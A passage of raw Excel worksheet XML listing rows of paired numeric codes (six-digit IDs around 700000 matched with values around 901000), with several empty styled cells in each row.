    </row>
    <row r="3214" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3214" s="5">
        <v>700260</v>
      </c>
      <c r="B3214" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D3214" s="5"/>
      <c r="E3214" s="3"/>
      <c r="F3214" s="1"/>
      <c r="H3214" s="1"/>
    </row>
    <row r="3215" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3215" s="5">
        <v>700260</v>
      </c>
      <c r="B3215" s="3">
        <v>901124</v>
      </c>
      <c r="D3215" s="5"/>
      <c r="E3215" s="3"/>
      <c r="F3215" s="1"/>
      <c r="H3215" s="1"/>
    </row>
    <row r="3216" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3216" s="5">
        <v>700260</v>
      </c>
      <c r="B3216" s="3">
        <v>901080</v>
      </c>
      <c r="D3216" s="5"/>
      <c r="E3216" s="3"/>
      <c r="F3216" s="1"/>
      <c r="H3216" s="1"/>
    </row>
    <row r="3217" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3217" s="5">
        <v>700260</v>
      </c>
      <c r="B3217" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D3217" s="5"/>
      <c r="E3217" s="3"/>
      <c r="F3217" s="1"/>
      <c r="H3217" s="1"/>
    </row>
    <row r="3218" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3218" s="5">
        <v>700260</v>
      </c>
      <c r="B3218" s="3">
        <v>901125</v>
      </c>
      <c r="D3218" s="5"/>
      <c r="E3218" s="3"/>
      <c r="F3218" s="1"/>
      <c r="H3218" s="1"/>
    </row>
    <row r="3219" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3219" s="5">
        <v>700260</v>
      </c>
      <c r="B3219" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D3219" s="5"/>
      <c r="E3219" s="3"/>
      <c r="F3219" s="1"/>
      <c r="H3219" s="1"/>
    </row>
    <row r="3220" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3220" s="5">
        <v>700231</v>
      </c>
      <c r="B3220" s="3">
        <v>901027</v>
      </c>
      <c r="D3220" s="5"/>
      <c r="E3220" s="3"/>
      <c r="F3220" s="1"/>
      <c r="H3220" s="1"/>
    </row>
    <row r="3221" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3221" s="5">
        <v>700100</v>
      </c>
      <c r="B3221" s="3">
        <v>901016</v>
      </c>
      <c r="D3221" s="5"/>
      <c r="E3221" s="3"/>
      <c r="F3221" s="1"/>
      <c r="H3221" s="1"/>
    </row>
    <row r="3222" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3222" s="5">
        <v>700581</v>
      </c>
      <c r="B3222" s="3">
        <v>901059.00600000005</v>
      </c>
      <c r="D3222" s="5"/>
      <c r="E3222" s="3"/>
      <c r="F3222" s="1"/>
      <c r="H3222" s="1"/>
    </row>
    <row r="3223" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3223" s="5">
        <v>700581</v>
      </c>
      <c r="B3223" s="3">
        <v>901140</v>
      </c>
      <c r="D3223" s="5"/>
      <c r="E3223" s="3"/>
      <c r="F3223" s="1"/>
      <c r="H3223" s="1"/>
    </row>
    <row r="3224" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3224" s="5">
        <v>700581</v>
      </c>
      <c r="B3224" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D3224" s="5"/>
      <c r="E3224" s="3"/>
      <c r="F3224" s="1"/>
      <c r="H3224" s="1"/>
    </row>
    <row r="3225" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3225" s="5">
        <v>700581</v>
      </c>
      <c r="B3225" s="3">
        <v>901027</v>
      </c>
      <c r="D3225" s="5"/>
      <c r="E3225" s="3"/>
      <c r="F3225" s="1"/>
      <c r="H3225" s="1"/>
    </row>
    <row r="3226" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3226" s="5">
        <v>700581</v>
      </c>
      <c r="B3226" s="3">
        <v>901057</v>
      </c>
      <c r="D3226" s="5"/>
      <c r="E3226" s="3"/>
      <c r="F3226" s="1"/>
      <c r="H3226" s="1"/>
    </row>
    <row r="3227" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3227" s="5">
        <v>700581</v>
      </c>
      <c r="B3227" s="3">
        <v>901055</v>
      </c>
      <c r="D3227" s="5"/>
      <c r="E3227" s="3"/>
      <c r="F3227" s="1"/>
      <c r="H3227" s="1"/>
    </row>
    <row r="3228" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3228" s="5">
        <v>700581</v>
      </c>
      <c r="B3228" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D3228" s="5"/>
      <c r="E3228" s="3"/>
      <c r="F3228" s="1"/>
      <c r="H3228" s="1"/>
    </row>
    <row r="3229" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3229" s="5">
        <v>700581</v>
      </c>
      <c r="B3229" s="3">
        <v>901053.005</v>
      </c>
      <c r="D3229" s="5"/>
      <c r="E3229" s="3"/>
      <c r="F3229" s="1"/>
      <c r="H3229" s="1"/>
    </row>
    <row r="3230" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3230" s="5">
        <v>700189</v>
      </c>
      <c r="B3230" s="3">
        <v>901140</v>
      </c>
      <c r="D3230" s="5"/>
      <c r="E3230" s="3"/>
      <c r="F3230" s="1"/>
      <c r="H3230" s="1"/>
    </row>
    <row r="3231" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3231" s="5">
        <v>700189</v>
      </c>
      <c r="B3231" s="3">
        <v>901027</v>
      </c>
      <c r="D3231" s="5"/>
      <c r="E3231" s="3"/>
      <c r="F3231" s="1"/>
      <c r="H3231" s="1"/>
    </row>
    <row r="3232" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3232" s="5">
        <v>700189</v>
      </c>
      <c r="B3232" s="3">
        <v>901055.01199999999</v>
      </c>
      <c r="D3232" s="5"/>
      <c r="E3232" s="3"/>
      <c r="F3232" s="1"/>
      <c r="H3232" s="1"/>
    </row>
    <row r="3233" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3233" s="5">
        <v>700189</v>
      </c>
      <c r="B3233" s="3">
        <v>901053.005</v>
      </c>
      <c r="D3233" s="5"/>
      <c r="E3233" s="3"/>
      <c r="F3233" s="1"/>
      <c r="H3233" s="1"/>
    </row>
    <row r="3234" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3234" s="5">
        <v>700015</v>
      </c>
      <c r="B3234" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3234" s="5"/>
      <c r="E3234" s="3"/>
      <c r="F3234" s="1"/>
      <c r="H3234" s="1"/>
    </row>
    <row r="3235" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3235" s="5">
        <v>700015</v>
      </c>
      <c r="B3235" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3235" s="5"/>
      <c r="E3235" s="3"/>
      <c r="F3235" s="1"/>
      <c r="H3235" s="1"/>
    </row>
    <row r="3236" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3236" s="5">
        <v>700015</v>
      </c>
      <c r="B3236" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3236" s="5"/>
      <c r="E3236" s="3"/>
      <c r="F3236" s="1"/>
      <c r="H3236" s="1"/>
    </row>
    <row r="3237" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3237" s="5">
        <v>700015</v>
      </c>
      <c r="B3237" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D3237" s="5"/>
      <c r="E3237" s="3"/>
      <c r="F3237" s="1"/>
      <c r="H3237" s="1"/>
    </row>
    <row r="3238" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3238" s="5">
        <v>700015</v>
      </c>
      <c r="B3238" s="3">
        <v>901005</v>
      </c>
      <c r="D3238" s="5"/>
      <c r="E3238" s="3"/>
      <c r="F3238" s="1"/>
      <c r="H3238" s="1"/>
    </row>
    <row r="3239" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3239" s="5">
        <v>700015</v>
      </c>
      <c r="B3239" s="3">
        <v>901083</v>
      </c>
      <c r="D3239" s="5"/>
      <c r="E3239" s="3"/>
      <c r="F3239" s="1"/>
      <c r="H3239" s="1"/>
    </row>
    <row r="3240" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3240" s="5">
        <v>700015</v>
      </c>
      <c r="B3240" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D3240" s="5"/>
      <c r="E3240" s="3"/>
      <c r="F3240" s="1"/>
      <c r="H3240" s="1"/>
    </row>
    <row r="3241" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3241" s="5">
        <v>700015</v>
      </c>
      <c r="B3241" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D3241" s="5"/>
      <c r="E3241" s="3"/>
      <c r="F3241" s="1"/>
      <c r="H3241" s="1"/>
    </row>
    <row r="3242" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3242" s="5">
        <v>700015</v>
      </c>
      <c r="B3242" s="3">
        <v>901105</v>
      </c>
      <c r="D3242" s="5"/>
      <c r="E3242" s="3"/>
      <c r="F3242" s="1"/>
      <c r="H3242" s="1"/>
    </row>
    <row r="3243" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3243" s="5">
        <v>700015</v>
      </c>
      <c r="B3243" s="3">
        <v>901036.005</v>
      </c>
      <c r="D3243" s="5"/>
      <c r="E3243" s="3"/>
      <c r="F3243" s="1"/>
      <c r="H3243" s="1"/>
    </row>
    <row r="3244" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3244" s="5">
        <v>700015</v>
      </c>
      <c r="B3244" s="3">
        <v>901057</v>
      </c>
      <c r="D3244" s="5"/>
      <c r="E3244" s="3"/>
      <c r="F3244" s="1"/>
      <c r="H3244" s="1"/>
    </row>
    <row r="3245" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3245" s="5">
        <v>700015</v>
      </c>
      <c r="B3245" s="3">
        <v>901082</v>
      </c>
      <c r="D3245" s="5"/>
      <c r="E3245" s="3"/>
      <c r="F3245" s="1"/>
      <c r="H3245" s="1"/>
    </row>
    <row r="3246" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3246" s="5">
        <v>700015</v>
      </c>
      <c r="B3246" s="3">
        <v>901016</v>
      </c>
      <c r="D3246" s="5"/>
      <c r="E3246" s="3"/>
      <c r="F3246" s="1"/>
      <c r="H3246" s="1"/>
    </row>
    <row r="3247" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3247" s="5">
        <v>700015</v>
      </c>
      <c r="B3247" s="3">
        <v>901033</v>
      </c>
      <c r="D3247" s="5"/>
      <c r="E3247" s="3"/>
      <c r="F3247" s="1"/>
      <c r="H3247" s="1"/>
    </row>
    <row r="3248" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3248" s="5">
        <v>700015</v>
      </c>
      <c r="B3248" s="3">
        <v>901007</v>
      </c>
      <c r="D3248" s="5"/>
      <c r="E3248" s="3"/>
      <c r="F3248" s="1"/>
      <c r="H3248" s="1"/>
    </row>
    <row r="3249" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3249" s="5">
        <v>700163</v>
      </c>
      <c r="B3249" s="3">
        <v>901123</v>
      </c>
      <c r="D3249" s="5"/>
      <c r="E3249" s="3"/>
      <c r="F3249" s="1"/>
      <c r="H3249" s="1"/>
    </row>
    <row r="3250" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3250" s="5">
        <v>700163</v>
      </c>
      <c r="B3250" s="3">
        <v>901053.00300000003</v>
      </c>
      <c r="D3250" s="5"/>
      <c r="E3250" s="3"/>
      <c r="F3250" s="1"/>
      <c r="H3250" s="1"/>
    </row>
    <row r="3251" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3251" s="5">
        <v>700163</v>
      </c>
      <c r="B3251" s="3">
        <v>901113</v>
      </c>
      <c r="D3251" s="5"/>
      <c r="E3251" s="3"/>
      <c r="F3251" s="1"/>
      <c r="H3251" s="1"/>
    </row>
    <row r="3252" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3252" s="5">
        <v>700163</v>
      </c>
      <c r="B3252" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D3252" s="5"/>
      <c r="E3252" s="3"/>
      <c r="F3252" s="1"/>
      <c r="H3252" s="1"/>
    </row>
    <row r="3253" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3253" s="5">
        <v>700528</v>
      </c>
      <c r="B3253" s="3">
        <v>901059.005</v>
      </c>
      <c r="D3253" s="5"/>
      <c r="E3253" s="3"/>
      <c r="F3253" s="1"/>
      <c r="H3253" s="1"/>
    </row>
    <row r="3254" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3254" s="5">
        <v>700528</v>
      </c>
      <c r="B3254" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D3254" s="5"/>
      <c r="E3254" s="3"/>
      <c r="F3254" s="1"/>
      <c r="H3254" s="1"/>
    </row>
    <row r="3255" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3255" s="5">
        <v>700528</v>
      </c>
      <c r="B3255" s="3">
        <v>901574.00199999998</v>
      </c>
      <c r="D3255" s="5"/>
      <c r="E3255" s="3"/>
      <c r="F3255" s="1"/>
      <c r="H3255" s="1"/>
    </row>
    <row r="3256" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3256" s="5">
        <v>700528</v>
      </c>
      <c r="B3256" s="3">
        <v>901105</v>
      </c>
      <c r="D3256" s="5"/>
      <c r="E3256" s="3"/>
      <c r="F3256" s="1"/>
      <c r="H3256" s="1"/>
    </row>
    <row r="3257" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3257" s="5">
        <v>700528</v>
      </c>
      <c r="B3257" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D3257" s="5"/>
      <c r="E3257" s="3"/>
      <c r="F3257" s="1"/>
      <c r="H3257" s="1"/>
    </row>
    <row r="3258" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3258" s="5">
        <v>700528</v>
      </c>
      <c r="B3258" s="3">
        <v>901566.00100000005</v>
      </c>
      <c r="D3258" s="5"/>
      <c r="E3258" s="3"/>
      <c r="F3258" s="1"/>
      <c r="H3258" s="1"/>
    </row>
    <row r="3259" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3259" s="5">
        <v>700528</v>
      </c>
      <c r="B3259" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D3259" s="5"/>
      <c r="E3259" s="3"/>
      <c r="F3259" s="1"/>
      <c r="H3259" s="1"/>
    </row>
    <row r="3260" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3260" s="5">
        <v>700528</v>
      </c>
      <c r="B3260" s="3">
        <v>901057</v>
      </c>
      <c r="D3260" s="5"/>
      <c r="E3260" s="3"/>
      <c r="F3260" s="1"/>
      <c r="H3260" s="1"/>
    </row>
    <row r="3261" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3261" s="5">
        <v>700528</v>
      </c>
      <c r="B3261" s="3">
        <v>901218.00699999998</v>
      </c>
      <c r="D3261" s="5"/>
      <c r="E3261" s="3"/>
      <c r="F3261" s="1"/>
      <c r="H3261" s="1"/>
    </row>
    <row r="3262" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3262" s="5">
        <v>700528</v>
      </c>
      <c r="B3262" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D3262" s="5"/>
      <c r="E3262" s="3"/>
      <c r="F3262" s="1"/>
      <c r="H3262" s="1"/>
    </row>
    <row r="3263" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3263" s="5">
        <v>700528</v>
      </c>
      <c r="B3263" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D3263" s="5"/>
      <c r="E3263" s="3"/>
      <c r="F3263" s="1"/>
      <c r="H3263" s="1"/>
    </row>
    <row r="3264" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3264" s="5">
        <v>700528</v>
      </c>
      <c r="B3264" s="3">
        <v>901102.00100000005</v>
      </c>
      <c r="D3264" s="5"/>
      <c r="E3264" s="3"/>
      <c r="F3264" s="1"/>
      <c r="H3264" s="1"/>
    </row>
    <row r="3265" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3265" s="5">
        <v>700389</v>
      </c>
      <c r="B3265" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3265" s="5"/>
      <c r="E3265" s="3"/>
      <c r="F3265" s="1"/>
      <c r="H3265" s="1"/>
    </row>
    <row r="3266" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3266" s="5">
        <v>700389</v>
      </c>
      <c r="B3266" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D3266" s="5"/>
      <c r="E3266" s="3"/>
      <c r="F3266" s="1"/>
      <c r="H3266" s="1"/>
    </row>
    <row r="3267" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3267" s="5">
        <v>700389</v>
      </c>
      <c r="B3267" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3267" s="5"/>
      <c r="E3267" s="3"/>
      <c r="F3267" s="1"/>
      <c r="H3267" s="1"/>
    </row>
    <row r="3268" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3268" s="5">
        <v>700389</v>
      </c>
      <c r="B3268" s="3">
        <v>901059.005</v>
      </c>
      <c r="D3268" s="5"/>
      <c r="E3268" s="3"/>
      <c r="F3268" s="1"/>
      <c r="H3268" s="1"/>
    </row>
    <row r="3269" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3269" s="5">
        <v>700389</v>
      </c>
      <c r="B3269" s="3">
        <v>901486</v>
      </c>
      <c r="D3269" s="5"/>
      <c r="E3269" s="3"/>
      <c r="F3269" s="1"/>
      <c r="H3269" s="1"/>
    </row>
    <row r="3270" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3270" s="5">
        <v>700389</v>
      </c>
      <c r="B3270" s="3">
        <v>901490</v>
      </c>
      <c r="D3270" s="5"/>
      <c r="E3270" s="3"/>
      <c r="F3270" s="1"/>
      <c r="H3270" s="1"/>
    </row>
    <row r="3271" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3271" s="5">
        <v>700389</v>
      </c>
      <c r="B3271" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D3271" s="5"/>
      <c r="E3271" s="3"/>
      <c r="F3271" s="1"/>
      <c r="H3271" s="1"/>
    </row>
    <row r="3272" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3272" s="5">
        <v>700044</v>
      </c>
      <c r="B3272" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3272" s="5"/>
      <c r="E3272" s="3"/>
      <c r="F3272" s="1"/>
      <c r="H3272" s="1"/>
    </row>
    <row r="3273" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3273" s="5">
        <v>700044</v>
      </c>
      <c r="B3273" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3273" s="5"/>
      <c r="E3273" s="3"/>
      <c r="F3273" s="1"/>
      <c r="H3273" s="1"/>
    </row>
    <row r="3274" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3274" s="5">
        <v>700044</v>
      </c>
      <c r="B3274" s="3">
        <v>901037.00100000005</v>
      </c>
      <c r="D3274" s="5"/>
      <c r="E3274" s="3"/>
      <c r="F3274" s="1"/>
      <c r="H3274" s="1"/>
    </row>
    <row r="3275" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3275" s="5">
        <v>700044</v>
      </c>
      <c r="B3275" s="3">
        <v>901115</v>
      </c>
      <c r="D3275" s="5"/>
      <c r="E3275" s="3"/>
      <c r="F3275" s="1"/>
      <c r="H3275" s="1"/>
    </row>
    <row r="3276" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3276" s="5">
        <v>700044</v>
      </c>
      <c r="B3276" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3276" s="5"/>
      <c r="E3276" s="3"/>
      <c r="F3276" s="1"/>
      <c r="H3276" s="1"/>
    </row>
    <row r="3277" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3277" s="5">
        <v>700044</v>
      </c>
      <c r="B3277" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D3277" s="5"/>
      <c r="E3277" s="3"/>
      <c r="F3277" s="1"/>
      <c r="H3277" s="1"/>
    </row>
    <row r="3278" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3278" s="5">
        <v>700044</v>
      </c>
      <c r="B3278" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D3278" s="5"/>
      <c r="E3278" s="3"/>
      <c r="F3278" s="1"/>
      <c r="H3278" s="1"/>
    </row>
    <row r="3279" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3279" s="5">
        <v>700044</v>
      </c>
      <c r="B3279" s="3">
        <v>901546.01500000001</v>
      </c>
      <c r="D3279" s="5"/>
      <c r="E3279" s="3"/>
      <c r="F3279" s="1"/>
      <c r="H3279" s="1"/>
    </row>
    <row r="3280" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3280" s="5">
        <v>700044</v>
      </c>
      <c r="B3280" s="3">
        <v>901068</v>
      </c>
      <c r="D3280" s="5"/>
      <c r="E3280" s="3"/>
      <c r="F3280" s="1"/>
      <c r="H3280" s="1"/>
    </row>
    <row r="3281" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3281" s="5">
        <v>700044</v>
      </c>
      <c r="B3281" s="3">
        <v>901008</v>
      </c>
      <c r="D3281" s="5"/>
      <c r="E3281" s="3"/>
      <c r="F3281" s="1"/>
      <c r="H3281" s="1"/>
    </row>
    <row r="3282" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3282" s="5">
        <v>700044</v>
      </c>
      <c r="B3282" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D3282" s="5"/>
      <c r="E3282" s="3"/>
      <c r="F3282" s="1"/>
      <c r="H3282" s="1"/>
    </row>
    <row r="3283" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3283" s="5">
        <v>700044</v>
      </c>
      <c r="B3283" s="3">
        <v>901105</v>
      </c>
      <c r="D3283" s="5"/>
      <c r="E3283" s="3"/>
      <c r="F3283" s="1"/>
      <c r="H3283" s="1"/>
    </row>
    <row r="3284" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3284" s="5">
        <v>700044</v>
      </c>
      <c r="B3284" s="3">
        <v>901027</v>
      </c>
      <c r="D3284" s="5"/>
      <c r="E3284" s="3"/>
      <c r="F3284" s="1"/>
      <c r="H3284" s="1"/>
    </row>
    <row r="3285" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3285" s="5">
        <v>700044</v>
      </c>
      <c r="B3285" s="3">
        <v>901057</v>
      </c>
      <c r="D3285" s="5"/>
      <c r="E3285" s="3"/>
      <c r="F3285" s="1"/>
      <c r="H3285" s="1"/>
    </row>
    <row r="3286" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3286" s="5">
        <v>700044</v>
      </c>
      <c r="B3286" s="3">
        <v>901055</v>
      </c>
      <c r="D3286" s="5"/>
      <c r="E3286" s="3"/>
      <c r="F3286" s="1"/>
      <c r="H3286" s="1"/>
    </row>
    <row r="3287" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3287" s="5">
        <v>700044</v>
      </c>
      <c r="B3287" s="3">
        <v>901053.005</v>
      </c>
      <c r="D3287" s="5"/>
      <c r="E3287" s="3"/>
      <c r="F3287" s="1"/>
      <c r="H3287" s="1"/>
    </row>
    <row r="3288" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3288" s="5">
        <v>700044</v>
      </c>
      <c r="B3288" s="3">
        <v>901113</v>
      </c>
      <c r="D3288" s="5"/>
      <c r="E3288" s="3"/>
      <c r="F3288" s="1"/>
      <c r="H3288" s="1"/>
    </row>
    <row r="3289" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3289" s="5">
        <v>700044</v>
      </c>
      <c r="B3289" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D3289" s="5"/>
      <c r="E3289" s="3"/>
      <c r="F3289" s="1"/>
      <c r="H3289" s="1"/>
    </row>
    <row r="3290" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3290" s="5">
        <v>700044</v>
      </c>
      <c r="B3290" s="3">
        <v>901082</v>
      </c>
      <c r="D3290" s="5"/>
      <c r="E3290" s="3"/>
      <c r="F3290" s="1"/>
      <c r="H3290" s="1"/>
    </row>
    <row r="3291" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3291" s="5">
        <v>700044</v>
      </c>
      <c r="B3291" s="3">
        <v>901016</v>
      </c>
      <c r="D3291" s="5"/>
      <c r="E3291" s="3"/>
      <c r="F3291" s="1"/>
      <c r="H3291" s="1"/>
    </row>
    <row r="3292" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3292" s="5">
        <v>700201</v>
      </c>
      <c r="B3292" s="3">
        <v>901071.00199999998</v>
      </c>
      <c r="D3292" s="5"/>
      <c r="E3292" s="3"/>
      <c r="F3292" s="1"/>
      <c r="H3292" s="1"/>
    </row>
    <row r="3293" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3293" s="5">
        <v>700201</v>
      </c>
      <c r="B3293" s="3">
        <v>901071.00300000003</v>
      </c>
      <c r="D3293" s="5"/>
      <c r="E3293" s="3"/>
      <c r="F3293" s="1"/>
      <c r="H3293" s="1"/>
    </row>
    <row r="3294" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3294" s="5">
        <v>700201</v>
      </c>
      <c r="B3294" s="3">
        <v>901197</v>
      </c>
      <c r="D3294" s="5"/>
      <c r="E3294" s="3"/>
      <c r="F3294" s="1"/>
      <c r="H3294" s="1"/>
    </row>
    <row r="3295" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3295" s="5">
        <v>700201</v>
      </c>
      <c r="B3295" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D3295" s="5"/>
      <c r="E3295" s="3"/>
      <c r="F3295" s="1"/>
      <c r="H3295" s="1"/>
    </row>
    <row r="3296" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3296" s="5">
        <v>700201</v>
      </c>
      <c r="B3296" s="3">
        <v>901083</v>
      </c>
      <c r="D3296" s="5"/>
      <c r="E3296" s="3"/>
      <c r="F3296" s="1"/>
      <c r="H3296" s="1"/>
    </row>
    <row r="3297" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3297" s="5">
        <v>700201</v>
      </c>
      <c r="B3297" s="3">
        <v>901222.00100000005</v>
      </c>
      <c r="D3297" s="5"/>
      <c r="E3297" s="3"/>
      <c r="F3297" s="1"/>
      <c r="H3297" s="1"/>
    </row>
    <row r="3298" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3298" s="5">
        <v>700201</v>
      </c>
      <c r="B3298" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D3298" s="5"/>
      <c r="E3298" s="3"/>
      <c r="F3298" s="1"/>
      <c r="H3298" s="1"/>
    </row>
    <row r="3299" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3299" s="5">
        <v>700201</v>
      </c>
      <c r="B3299" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D3299" s="5"/>
      <c r="E3299" s="3"/>
      <c r="F3299" s="1"/>
      <c r="H3299" s="1"/>
    </row>
    <row r="3300" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3300" s="5">
        <v>700201</v>
      </c>
      <c r="B3300" s="3">
        <v>901105</v>
      </c>
      <c r="D3300" s="5"/>
      <c r="E3300" s="3"/>
      <c r="F3300" s="1"/>
      <c r="H3300" s="1"/>
    </row>
    <row r="3301" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3301" s="5">
        <v>700201</v>
      </c>
      <c r="B3301" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D3301" s="5"/>
      <c r="E3301" s="3"/>
      <c r="F3301" s="1"/>
      <c r="H3301" s="1"/>
    </row>
    <row r="3302" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3302" s="5">
        <v>700201</v>
      </c>
      <c r="B3302" s="3">
        <v>901027</v>
      </c>
      <c r="D3302" s="5"/>
      <c r="E3302" s="3"/>
      <c r="F3302" s="1"/>
      <c r="H3302" s="1"/>
    </row>
    <row r="3303" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3303" s="5">
        <v>700201</v>
      </c>
      <c r="B3303" s="3">
        <v>901069.00100000005</v>
      </c>
      <c r="D3303" s="5"/>
      <c r="E3303" s="3"/>
      <c r="F3303" s="1"/>
      <c r="H3303" s="1"/>
    </row>
    <row r="3304" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3304" s="5">
        <v>700201</v>
      </c>
      <c r="B3304" s="3">
        <v>901057</v>
      </c>
      <c r="D3304" s="5"/>
      <c r="E3304" s="3"/>
      <c r="F3304" s="1"/>
      <c r="H3304" s="1"/>
    </row>
    <row r="3305" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3305" s="5">
        <v>700201</v>
      </c>
      <c r="B3305" s="3">
        <v>901055</v>
      </c>
      <c r="D3305" s="5"/>
      <c r="E3305" s="3"/>
      <c r="F3305" s="1"/>
      <c r="H3305" s="1"/>
    </row>
    <row r="3306" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3306" s="5">
        <v>700201</v>
      </c>
      <c r="B3306" s="3">
        <v>901012</v>
      </c>
      <c r="D3306" s="5"/>
      <c r="E3306" s="3"/>
      <c r="F3306" s="1"/>
      <c r="H3306" s="1"/>
    </row>
    <row r="3307" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3307" s="5">
        <v>700201</v>
      </c>
